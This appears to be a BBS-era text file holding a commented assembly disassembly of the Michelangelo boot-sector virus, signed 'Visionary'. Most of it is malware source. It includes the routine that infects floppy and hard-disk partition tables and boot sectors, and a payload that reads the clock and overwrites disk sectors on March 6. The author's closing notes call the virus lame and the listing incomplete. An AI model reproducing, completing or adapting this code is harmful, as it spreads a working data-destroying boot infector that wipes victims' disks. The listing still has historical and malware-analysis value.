226 lines
6.7 KiB
Plaintext
226 lines
6.7 KiB
Plaintext
; Michelangelo
|
|
; Size: 512
|
|
; Type: Boot infector
|
|
; Date of action: March 6th
|
|
;
|
|
;
|
|
|
|
data_1e equ 4Ch ; (0000:004C=1DB1h)
|
|
data_2e equ 4Eh ; (0000:004E=70h)
|
|
data_3e equ 413h ; (0000:0413=280h)
|
|
data_4e equ 7C05h ; (0000:7C05=203Ch)
|
|
data_5e equ 7C0Ah ; (0000:7C0A=49EBh)
|
|
data_6e equ 7C0Ch ; (0000:7C0C=2A3Ch)
|
|
data_7e equ 7 ; (694E:0007=0)
|
|
data_8e equ 8 ; (694E:0008=0)
|
|
data_9e equ 0Ah ; (694E:000A=0)
|
|
data_11e equ 7C03h ; (694E:7C03=0)
|
|
|
|
seg_a segment
|
|
assume cs:seg_a, ds:seg_a
|
|
|
|
|
|
org 100h
|
|
|
|
mich proc far
|
|
|
|
start:
|
|
jmp loc_6 ; (01AF) "This is what you see at sector 0"
|
|
db 0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
|
|
db 0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
|
|
db 50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
|
|
db 0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
|
|
db 4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
|
|
db 9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
|
|
db 9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
|
|
db 2, 0, 58h, 1Fh, 2Eh, 0FFh
|
|
db 2Eh, 0Ah, 0, 50h, 53h, 51h
|
|
db 52h, 1Eh, 6, 56h, 57h, 0Eh
|
|
db 1Fh, 0Eh, 7, 0BEh, 4, 0
|
|
loc_1: ;Init registers
|
|
mov ax,201h
|
|
mov bx,200h
|
|
mov cx,1
|
|
xor dx,dx ; Zero register
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e ; (694E:000A=0)
|
|
jnc loc_2 ; Jump if carry=0
|
|
xor ax,ax ; Zero register
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e ; (694E:000A=0)
|
|
dec si
|
|
jnz loc_1 ; Jump if not zero
|
|
jmp short loc_5 ; (01A6)
|
|
loc_2: ;Zero registers clear direction
|
|
xor si,si ; Zero register
|
|
cld ; Clear direction
|
|
lodsw ; String [si] to ax
|
|
cmp ax,[bx]
|
|
jne loc_3 ; Jump if not equal
|
|
lodsw ; String [si] to ax
|
|
cmp ax,[bx+2]
|
|
je loc_5 ; Jump if equal
|
|
loc_3: ; cmp byte ptr See infected
|
|
mov ax,301h
|
|
mov dh,1
|
|
mov cl,3
|
|
cmp byte ptr [bx+15h],0FDh
|
|
je loc_4 ; Jump if equal
|
|
mov cl,0Eh
|
|
loc_4: ;call out all db hiden data
|
|
mov ds:data_8e,cx ; (694E:0008=0)
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e ; (694E:000A=0)
|
|
jc loc_5 ; Jump if carry Set
|
|
mov si,3BEh
|
|
mov di,1BEh
|
|
mov cx,21h
|
|
cld ; Clear direction
|
|
rep movsw ; Rep while cx>0 Mov [si]
|
|
mov ax,301h ; to es:[di]
|
|
xor bx,bx ; Zero register
|
|
mov cx,1
|
|
xor dx,dx ; Zero register
|
|
pushf ; Push flags
|
|
call dword ptr ds:data_9e ; (694E:000A=0)
|
|
loc_5: ;Clear all set
|
|
pop di
|
|
pop si
|
|
pop es
|
|
pop ds
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
retn
|
|
loc_6: ;Load all hiden data
|
|
xor ax,ax ; Zero register
|
|
mov ds,ax
|
|
cli ; Disable interrupts
|
|
mov ss,ax
|
|
mov ax,7C00h
|
|
mov sp,ax
|
|
sti ; Enable interrupts
|
|
push ds
|
|
push ax
|
|
mov ax,ds:data_1e ; (0000:004C=1DB1h)
|
|
mov ds:data_5e,ax ; (0000:7C0A=49EBh)
|
|
mov ax,ds:data_2e ; (0000:004E=70h)
|
|
mov ds:data_6e,ax ; (0000:7C0C=2A3Ch)
|
|
mov ax,ds:data_3e ; (0000:0413=280h)
|
|
dec ax
|
|
dec ax
|
|
mov ds:data_3e,ax ; (0000:0413=280h)
|
|
mov cl,6
|
|
shl ax,cl ; Shift w/zeros fill
|
|
mov es,ax
|
|
mov ds:data_4e,ax ; (0000:7C05=203Ch)
|
|
mov ax,0Eh
|
|
mov ds:data_1e,ax ; (0000:004C=1DB1h)
|
|
mov ds:data_2e,es ; (0000:004E=70h)
|
|
mov cx,1BEh
|
|
mov si,7C00h
|
|
xor di,di ; Zero register
|
|
cld ; Clear direction
|
|
rep movsb ; Rep while cx>0 Mov [si]
|
|
jmp dword ptr cs:data_11e ; to es:[di] (694E:7C03=0)
|
|
db 33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
|
|
db 0Eh, 1Fh, 0B8h, 1, 2, 0BBh ; cd 13
|
|
db 0, 7Ch, 8Bh, 0Eh, 8, 0
|
|
db 83h, 0F9h, 7, 75h, 7, 0BAh
|
|
db 80h, 0, 0CDh, 13h, 0EBh, 2Bh
|
|
db 8Bh, 0Eh, 8, 0, 0BAh, 0
|
|
db 1, 0CDh, 13h, 72h, 20h, 0Eh
|
|
db 7, 0B8h, 1, 2, 0BBh, 0
|
|
db 2, 0B9h, 1, 0, 0BAh, 80h
|
|
db 0, 0CDh, 13h, 72h, 0Eh, 33h
|
|
db 0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
|
|
db 4Fh, 0ADh, 3Bh, 47h, 2
|
|
db 75h, 49h
|
|
loc_7:;check if it is time to nuke
|
|
xor cx,cx ; Zero register
|
|
mov ah,4
|
|
int 1Ah ; Real time clock ah=func 04h don't work on an xt
|
|
; read date cx=year, dx=mon/day
|
|
cmp dx,306h ; See if March 6th
|
|
je loc_8 ; Jump if equal to nuking subs
|
|
retf ; Return to launch command.com
|
|
loc_8:;get ready
|
|
xor dx,dx ; Zero register
|
|
mov cx,1
|
|
loc_9:;run 7 times nuke 31.5 megs of hd
|
|
mov ax,309h
|
|
mov si,ds:data_8e ; (694E:0008=0)
|
|
cmp si,3
|
|
je loc_10 ; Jump if equal
|
|
mov al,0Eh
|
|
cmp si,0Eh
|
|
je loc_10 ; Jump if equal
|
|
mov dl,80h
|
|
mov byte ptr ds:data_7e,4 ; (694E:0007=0)
|
|
mov al,11h
|
|
loc_10: ;nuke away
|
|
mov bx,5000h
|
|
mov es,bx
|
|
int 13h ; Disk dl=drive a: ah=func 03h
|
|
; write sectors from mem es:bx
|
|
jnc loc_11 ; Jump if carry=0
|
|
xor ah,ah ; Zero register
|
|
int 13h ; Disk dl=drive a: ah=func 00h
|
|
; reset disk, al=return status
|
|
loc_11: ;rest for loc-9 nuking
|
|
inc dh
|
|
cmp dh,ds:data_7e ; (694E:0007=0)
|
|
jb loc_9 ; Jump if below
|
|
xor dh,dh ; Zero register
|
|
inc ch
|
|
jmp short loc_9 ; (0250)
|
|
loc_12:;time to infect a floppie or hard dirve
|
|
mov cx,7
|
|
mov ds:data_8e,cx ; (694E:0008=0)
|
|
mov ax,301h
|
|
mov dx,80h
|
|
int 13h ; Disk dl=drive a: ah=func 03h infect flopie
|
|
; write sectors from mem es:bx
|
|
jc loc_7 ; Jump if carry Set
|
|
mov si,3BEh
|
|
mov di,1BEh
|
|
mov cx,21h
|
|
rep movsw ; Rep while cx>0 Mov [si]
|
|
mov ax,301h : to es:[di]
|
|
xor bx,bx ; Zero register
|
|
inc cl
|
|
int 13h ; Disk dl=drive a: ah=func 03h lets infect hd
|
|
; write sectors from mem es:bx
|
|
;* jmp short loc_13 ;*(02E0)
|
|
db 0EBh, 32h
|
|
db 1, 4, 11h, 0, 80h, 0
|
|
db 5, 5, 32h, 1, 0, 0
|
|
db 0, 0, 0
|
|
db 53h, 53h, 20h, 20h, 43h, 4Fh
|
|
db 4Dh
|
|
db 58 dup (0)
|
|
db 55h, 0AAh
|
|
|
|
seg_a ends
|
|
|
|
;Last notes this virus looks like a poor hack job on the stoned virus.
|
|
;It is kinda cool in the fact that it is hard to get out of the partition table
|
|
;even if you nuke the partition table it will live on even if you replace it.
|
|
;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
|
|
;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
|
|
;this virus uses int 1ah which doesn't work on an XT system.
|
|
;the virus isn't actually 512 but that is how much it writes.
|
|
;it moves the boot area of a floppy to the last sector on the disk
|
|
;and on a harddrive it moves it to the last sector in the root directory
|
|
;This should show you all how much the media can over do it on things
|
|
;since this is really a lame virus,to tell you the truth there is a lot better
|
|
;ones out there.
|
|
;This in no way is a complete listing of the code for the virus.
|
|
;Nor is it the best since i'm not the best at Assembly.
|
|
;Done by Visionary.
|
|
;BTW to who ever wrote this virus... Get a life!
|
|
|
|
-------------------------------------------------------------------------------
|
|
Downloaded From P-80 Systems 304-744-2253
|